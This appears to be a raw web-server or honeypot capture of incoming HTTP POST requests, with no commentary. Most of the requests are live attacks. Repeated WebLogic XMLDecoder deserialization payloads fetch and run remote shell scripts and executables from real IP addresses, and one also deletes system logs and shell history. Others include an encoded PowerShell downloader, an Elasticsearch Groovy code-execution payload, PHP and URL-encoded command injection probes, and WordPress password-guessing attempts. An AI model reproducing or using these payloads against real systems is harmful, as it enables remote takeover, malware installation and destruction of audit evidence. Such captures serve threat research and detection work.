EK0NldLKYsr+W5poEXPtZmniPo64WxzpovppRI3AjlACNprkmVfNzMiR2kfdQFdfAIPHMc20CiHHHlldIEug1evvG6S4RogtClqB0FCLka6ZVKLBgY4coWHH/eVor7Cs4Dj8anEPohpjyvCpocuoiaIaWIBPI3nmHH+Vw6KNInf1CPzO0+hZBd0Yrq2vW3DryVmWMlsvBvNkahVaFASANY23e8IPO4cgMjn+np6xiqKfYOlZfCWglL01D4Z1Y4aiCES9tMfEDIxnfLRm2CpNSlenJANJb03tMCbnfovI/vSDhGUtaSVl2TAvbJTHbPy7BDMPQGwCjDx14MUpaHgXAchAnpgK83Z7VTswrySX4Azkt8YgSsAIaCWEoNduIEXLB4IHehFUCIruXeFqySsghQxZUYQZI/35ltwDi5b+
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=123456789
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
QqZdxd2eNgHzsIJfTdCvn9BtrEc3QgEDL+RhMgC+zcb+3BqTeaccXPoTwyRa/3a1WyU6LOQYDNBhGdP+fzkfWcSpHuuTkJ9XYF+aqTdoJi9DS88NzZ0FDRPQIsU7ktuLY6TOJp7WEcGvQ8b15+w9l7QWHX4e5/fCc2y5lOdJy9upm3eLnLfVBBSKYAGMT87TU/ZkAauqknhTmSUtvQQHqMCn0EKobd+V9P+jjyvK9leZ8kI3DPmQU3CU4j2DpFIapIPr3izEM6sBiOVpSao1mAb4b6WafmUA1ajs6evEK+p4MpVeE22IX15rKDW+AVay9ifl/XAPDwP8QjNliFymnMHg1NXXEZ39WbrPqK8VuOTFc3ZY2XV9oEbwUjDNo3p3j3dVjanKMh6wAl3QPQD9YhxCkEEztW2xZIBUtpPE36Ux8D1Bo/CGTEG4sw==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
QKRYlIueMehnEkb1wy2D6UuVtZ302tLzox9wVSTBsGSVQUzP8VWbNBH1jjls/7i+uwuLZwckTXYe2B6NoDiJKp8kUakD1cMSZtgvVO7GXBwEdex8vOyjH92l9AfaiwQIgfT2ZkvMHN8GcM4dsFnzGIXoSfDtxv4MfPnu6doi+oGUib9G0Gb/fEv/cHkTuXNTCVidx6AjxUFgxB1trB5EmsCJ0ducwrTXPUlUlFu8ZDYvOZFas/gDWuasWCqHOLk00JPh6kMzT1vn+usPsXFEoPy5RjGRsISR8FbMHy+vJzvwMAdkqPPpI3lGeNp3WxL7qbz83BDe1PTlCeGyuMj97r+9MsAj//4DY9kSGjNpfi6DAk9hGvaN7d6EAB0=
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
VV6ynXJEWTw+wTKmbSJ7D/EIgZBmKZZ5yu8Los7SedAlt0APNORChaUgMGOWQyA/oqDq/10h4mCp7CipwJdiUcDOjbbpirI3LnYK8D8DeLf/Rd3zyLpdbFjj3M+Tlmg9+ENK4P3ErI0XaEVEdYwzCzqe2M0v5NvVdGUjLz8mX/EBhKqfZCXjdAZ+KSOZWO9fqzG38ZWogMmmGKI8LsyNgslrgkpj0NQ/6QixOsrRdQF3jW8loPT4VhtwLoYyCsV7yPoBP1/5MuM4kwDSQZKn29unbyrr3m10NmJ6x4ckvQ545bNKTSkE3ehOlUR5ghWZoX0ZmtfKZUk8HsskqDCX1gUB+BiCQ12TrbK3LDug3ZlkUm2UHj5wgA4=
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=admin22
POST /j_security_check; HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
j_username=administrator&j_password=administrator&logonDomainName=
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://alog.umengcloud.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496473335624
X-Umeng-Sdk: Android/6.0.9 PopCat%2F2.1.2+MI+4LTE%2F4.4.4+D2EA899797B039FCD23DDA127C0FE621
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umengcloud.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2494
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /adminManager!login HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x:8080
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache
QqMLwdnPMDYtUQS86uXsHCLRqfhu3UxZJ9LbRIr02HO7p6pH99Iqv/kYuwop1NpwcmlH+kvoqJ0gdfi+Hxml29bGwb1TnuQfOEqmJ5/tlS1V4vag9Duh0RN/5KvItIM3/JREIvV9zoaI5vPyDs7aXQg5jbblaqFCwf3t3Qcbc+MaTuewMNKmzZKBspKfYEoQHTenhzq0ahhxrj4bVa9EzqaTZjAMLXsClz+8gYWInU3aT+jItBjBdyzDMSLCEhHU0PwYCfPusFlsZX1VaMKd8e3Js9OuJXfk7EQ9eMBF7KBsdALaiVlG62waU9Pf0oIRZzHOfGi92BuBx4Lrzq/6uWySOobGbIOUbL5DyGmumSazS/Y58CCMRTwsHHDkx11T+qMqQg==
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST http://best-proxies.ru/azenv.php?rand=be64e0931f72da652d73f8fb6073c527 HTTP/1.1
Cookie: testCookie=true
Host: best-proxies.ru
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: http://best-proxies.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=batman
POST http://boys-here.com/nntesto/http.php HTTP/1.0
Accept: */*
Referer: http://boys-here.com/nntesto/http.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: boys-here.com
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache
xrumer=inside
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
QPQLx46eYd+lsBWHFD+RHFrK19m4/5MHRUOnMcx1ZkKV9k6VvRmM4Y0VUHpcxtunkDKzJPIs82DH5T99NTfH1mchkT0RAHYn8Jj4NOPcSNohNneV/iGfBHHt36theM8Y3NqwYwmbv6JMOpnodBVmGWK2v/01g1EXb/r6ANN+I8e0hqyyeoDHkgUIKQOkHqcPBLFbjKcNU3SNKajcDvqtQLpA98VjCmeTTxnxCjxc+30o05sKUNqSNsO0fAKdTQk4iLHtgTjYqqTqKmViz/vZXT5Lejmaa3d/H2zBJZM0+H1v8ytTy4/qoQZUWLoWSIi8JFaW/ze27tfPpIcmPHE09cvuvY4izr8HbYo/e8denE1CzM1d3Dx0bYuG/uKhxiaW6oCQHrIgBrMLcccvZA==
POST http://check.proxyradar.com/azenv.php?auth=149300688035&a=PSCMN&i=3483038180&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1067
Content-Type: multipart/form-data; boundary=INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
119707
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
ae17a9b8250bc3bffc733df350d0804f
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--INYmDuG0T7m2JL85goVajYtb41JGk-RvMTZ_7J--
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 428
Cache-Control: no-cache
FKZbxtvJNbqXL+vh4e7nezy2ggj3rJnyBPNXrRUfWVaDBmQBoEfDgJl/f1KsxnpAIw/7fQ4RuW4Tn1gU0rL1QyB3duyWBPgj9htA3bHVz4kpjmb3KyrrjUtNlKw+2bR4w/qLY9rU5/5TLGxSM83nEqLhV2XPPun0MEAlqPDv0Jh/qAeSTei4zXuFwC6PNoyDs2TLNtov8z/jayPdGfJLr88o+XWqEmHL1FaVWU8wB4VkFsai3EzVwN48ZRw9m5nK0oXi0f6xk1h2nN+5m+FP0yZglwmz+PuYVP8VuttQe83WZDM0tyakpfnx5FZKjJbKdNu95OyzEoP5PdwQc7ohoke6K8/RZXjWWOF52vBkv4YdVxCqxxgZt3Z/kcX3x2jUYzyc75m2IgtrWwLY90k33hB4QsDZdrSsou8ayfZuG0g=
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅI™cÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl
POST /cgi?7 HTTP/1.0
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
"Content-Type": text/plain
"Referer": 139.59.32.227/mainFrame.htm
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149591747639&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /command.php HTTP/1.1
Accept: */*
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 208
cmd=%63%64%20%2F%76%61%72%2F%74%6D%70%20%26%26%20%65%63%68%6F%20%2D%6E%65%20%5C%5C%78%33%36%31%30%63%6B%65%72%20%3E%20%36%31%30%63%6B%65%72%2E%74%78%74%20%26%26%20%63%61%74%20%36%31%30%63%6B%65%72%2E%74%78%74
POST /license.php HTTP/1.1
Referer: http://www.jamesatchue.com/wp-admin/
User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
Accept: */*
